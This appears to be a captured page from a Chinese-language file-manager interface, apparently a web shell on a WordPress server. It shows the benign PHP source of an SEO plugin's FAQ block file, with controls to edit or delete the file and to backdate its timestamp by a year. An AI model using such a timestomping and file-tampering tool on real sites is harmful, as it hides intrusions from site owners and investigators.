文件操作 - FaqPage.php
返回文件管理
返回主菜单
删除本文件
文件: /home/www/public/wp-content/plugins/all-in-one-seo-pack/app/Common/Standalone/Blocks/FaqPage.php
编辑文件内容
<?php namespace AIOSEO\Plugin\Common\Standalone\Blocks; // Exit if accessed directly. if ( ! defined( 'ABSPATH' ) ) { exit; } /** * FaqPage Block. * * @since 4.2.3 */ class FaqPage extends Blocks { /** * Register the block. * * @since 4.2.3 * * @return void */ public function register() { aioseo()->blocks->registerBlock( 'faq', [ 'render_callback' => function( $attributes, $content ) { if ( isset( $attributes['hidden'] ) && true === $attributes['hidden'] ) { return ''; } return $content; }, ] ); } }
修改文件时间
将文件时间修改为当前时间的前一年
删除文件